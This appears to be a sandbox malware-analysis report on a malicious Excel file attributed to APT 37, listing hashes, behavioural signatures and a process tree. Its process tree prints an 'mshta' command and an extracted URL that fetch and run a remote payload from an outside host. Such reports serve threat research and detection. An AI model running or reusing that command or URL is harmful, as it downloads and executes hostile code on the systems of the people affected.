Analysis
- max time kernel: 146s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 21-03-2023 23:12
Behavioral tasks (task: sample, resource)
- behavioral1: APT 37 Previous Commits 1/(20220120)2022λ μ΄λμ°½ν μ λ μΈμ¬001.rar, win7-20230220-en
- behavioral2: APT 37 Previous Commits 1/(20220120)2022λ μ΄λμ°½ν μ λ μΈμ¬001.rar, win10v2004-20230220-en
- behavioral3: APT 37 Previous Commits 1/(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).rar, win7-20230220-en
- behavioral4: APT 37 Previous Commits 1/(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).rar, win10v2004-20230220-en
- behavioral5: APT 37 Previous Commits 1/(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls, win7-20230220-en
- behavioral6: APT 37 Previous Commits 1/(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls, win10v2004-20230220-en
- behavioral7: APT 37 Previous Commits 1/1.rar, win7-20230220-en
- behavioral8: APT 37 Previous Commits 1/1.rar, win10v2004-20230220-en
- behavioral9: APT 37 Previous Commits 1/2017-APEC.rar, win7-20230220-en
- behavioral10: APT 37 Previous Commits 1/2017-APEC.rar, win10v2004-20230221-en
- behavioral11: APT 37 Previous Commits 1/2021λ ICTμ΅ν© μ€λ§νΈκ³΅μ₯ κ΅¬μΆ λ° κ³ λν μ¬μ μ΅μ’ κ°λ¦¬.hwp, win7-20230220-en
- behavioral12: APT 37 Previous Commits 1/2021λ ICTμ΅ν© μ€λ§νΈκ³΅μ₯ κ΅¬μΆ λ° κ³ λν μ¬μ μ΅μ’ κ°λ¦¬.hwp, win10v2004-20230220-en
- behavioral13: APT 37 Previous Commits 1/2022 νκΈ° μ -νΈμ μ λͺ¨μ§μκ°.rar, win7-20230220-en
- behavioral14: APT 37 Previous Commits 1/2022 νκΈ° μ -νΈμ μ λͺ¨μ§μκ°.rar, win10v2004-20230220-en
- behavioral15: APT 37 Previous Commits 1/2022-01-27-notification.rar, win7-20230220-en
- behavioral16: APT 37 Previous Commits 1/2022-01-27-notification.rar, win10v2004-20230221-en
- behavioral17: APT 37 Previous Commits 1/2022-03-22.rar, win7-20230220-en
- behavioral18: APT 37 Previous Commits 1/2022-03-22.rar, win10v2004-20230220-en
- behavioral19: APT 37 Previous Commits 1/2022.04.27.rar, win7-20230220-en
- behavioral20: APT 37 Previous Commits 1/2022.04.27.rar, win10v2004-20230220-en
- behavioral21: APT 37 Previous Commits 1/20220315-112_Notice.rar, win7-20230220-en
- behavioral22: APT 37 Previous Commits 1/20220315-112_Notice.rar, win10v2004-20230220-en
- behavioral23: APT 37 Previous Commits 1/202203_5_06.rar, win7-20230220-en
- behavioral24: APT 37 Previous Commits 1/202203_5_06.rar, win10v2004-20230220-en
- behavioral25: APT 37 Previous Commits 1/20220510_115155.rar, win7-20230220-en
- behavioral26: APT 37 Previous Commits 1/20220510_115155.rar, win10v2004-20230220-en
- behavioral27: APT 37 Previous Commits 1/20220913.rar, win7-20230220-en
- behavioral28: APT 37 Previous Commits 1/20220913.rar, win10v2004-20230220-en
- behavioral29: APT 37 Previous Commits 1/20220916093205755684_TSA.rar, win7-20230220-en
- behavioral30: APT 37 Previous Commits 1/20220916093205755684_TSA.rar, win10v2004-20230221-en
- behavioral31: APT 37 Previous Commits 1/2022λ κ΅λ°©λΆ λΆμμ΄μ¬ μλ΄(λͺ½κ³¨λ¦¬μ).rar, win7-20230220-en
- behavioral32: APT 37 Previous Commits 1/2022λ κ΅λ°©λΆ λΆμμ΄μ¬ μλ΄(λͺ½κ³¨λ¦¬μ).rar, win10v2004-20230220-en
General
- Target: APT 37 Previous Commits 1/(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls
- Size: 135KB
- MD5: c8df23e698e196f803ace0f50a18944d
- SHA1: bf47a34bc092fa81918a387e8f5282f7a7d8a0c4
- SHA256: db70f269d62c43bd09580858731853a589e0f32f2d3c915b15cb9f0b4b9f12d2
- SHA512: 29146eff3ed7d8b6ddbf1736f2e2a2fb90a0cec1fc9f8244763802ef9af36bbf1fdd907eee198fe8d910cd3ae17227ab2d2b9e376d9243bdc549d602182f6ab3
- SSDEEP: 3072:Fk3hOdsylKlgryzc4bNhZFGzE+cL2knAeQN3QgBzMnNXHM6au7Fei9Yyg4/FQbux:Fk3hOdsylKlgryzc4bNhZF+E+W2knAeX
Malware Config
- Extracted URL: http://attiferstudio.com/install.bak/sony/6.html
Signatures
- Process spawned unexpected child process (2 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description; pid; pid_target; process; target process):
  - Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; 1828; 2256; cmd.exe; EXCEL.EXE
  - Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; 1272; 2256; WerFault.exe; EXCEL.EXE
- Blocklisted process makes network request (1 IoC)
  Processes (flow; pid; process):
  - 44; 2184; mshta.exe
- Process spawned suspicious child process (1 IoC)
  This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
  Processes (description; pid; pid_target; process; target process):
  - Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; 3772; 2256; DW20.EXE; EXCEL.EXE
- Program crash (1 IoC)
  Processes (pid; pid_target; process; target process):
  - 1272; 2256; WerFault.exe; EXCEL.EXE
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description; ioc; process):
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz; dwwin.exe
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString; dwwin.exe
  - Key opened; \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; EXCEL.EXE
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz; EXCEL.EXE
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString; EXCEL.EXE
  - Key opened; \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; dwwin.exe
- Enumerates system info in registry (2 TTPs, 5 IoCs)
  Processes (description; ioc; process):
  - Key opened; \REGISTRY\MACHINE\Hardware\Description\System\BIOS; EXCEL.EXE
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily; EXCEL.EXE
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU; EXCEL.EXE
  - Key opened; \REGISTRY\MACHINE\Hardware\Description\System\BIOS; dwwin.exe
  - Key value queried; \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU; dwwin.exe
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes (pid; process): 2256; EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes (pid; process): 2256; EXCEL.EXE (4 occurrences)
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes (pid; process): 2256; EXCEL.EXE (2 occurrences)
- Suspicious use of SetWindowsHookEx (12 IoCs)
  Processes (pid; process): 2256; EXCEL.EXE (12 occurrences)
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes (description; pid; process; target process):
  - PID 2256 wrote to memory of 1828; 2256; EXCEL.EXE; cmd.exe (2 occurrences)
  - PID 1828 wrote to memory of 2184; 1828; cmd.exe; mshta.exe (2 occurrences)
  - PID 2256 wrote to memory of 3772; 2256; EXCEL.EXE; DW20.EXE (2 occurrences)
  - PID 3772 wrote to memory of 2812; 3772; DW20.EXE; dwwin.exe (2 occurrences)
Processes (process tree; indentation shows parent/child depth)
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\APT 37 Previous Commits 1\(μμ) μ 20λ λν΅λ Ή μ·¨μμ μ¬μΈλν¬ μ°Έμμ μΆμ² λͺ λ¨(κ΅λ―ΌμνλΉμ 000).xls"
  Signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c mshta http://attiferstudio.com/install.bak/sony/6.html
    Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\mshta.exe
      Command line: mshta http://attiferstudio.com/install.bak/sony/6.html
      Signatures: Blocklisted process makes network request
  - C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
    Command line: "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 4292
    Signatures: Process spawned suspicious child process; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\dwwin.exe
      Command line: C:\Windows\system32\dwwin.exe -x -s 4292
      Signatures: Checks processor information in registry; Enumerates system info in registry
  - C:\Windows\system32\WerFault.exe
    Command line: C:\Windows\system32\WerFault.exe -u -p 2256 -s 3092
    Signatures: Process spawned unexpected child process; Program crash
- C:\Windows\system32\WerFault.exe
  Command line: C:\Windows\system32\WerFault.exe -pss -s 468 -p 2256 -ip 2256
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/2256-133-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmp (64KB)
- memory/2256-134-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmp (64KB)
- memory/2256-135-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmp (64KB)
- memory/2256-136-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmp (64KB)
- memory/2256-137-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmp (64KB)
- memory/2256-138-0x00007FF9A6360000-0x00007FF9A6370000-memory.dmp (64KB)
- memory/2256-139-0x00007FF9A6360000-0x00007FF9A6370000-memory.dmp (64KB)
- memory/3772-165-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmp (64KB)
- memory/3772-166-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmp (64KB)
- memory/3772-167-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmp (64KB)
- memory/3772-168-0x00007FF9A8790000-0x00007FF9A87A0000-memory.dmp (64KB)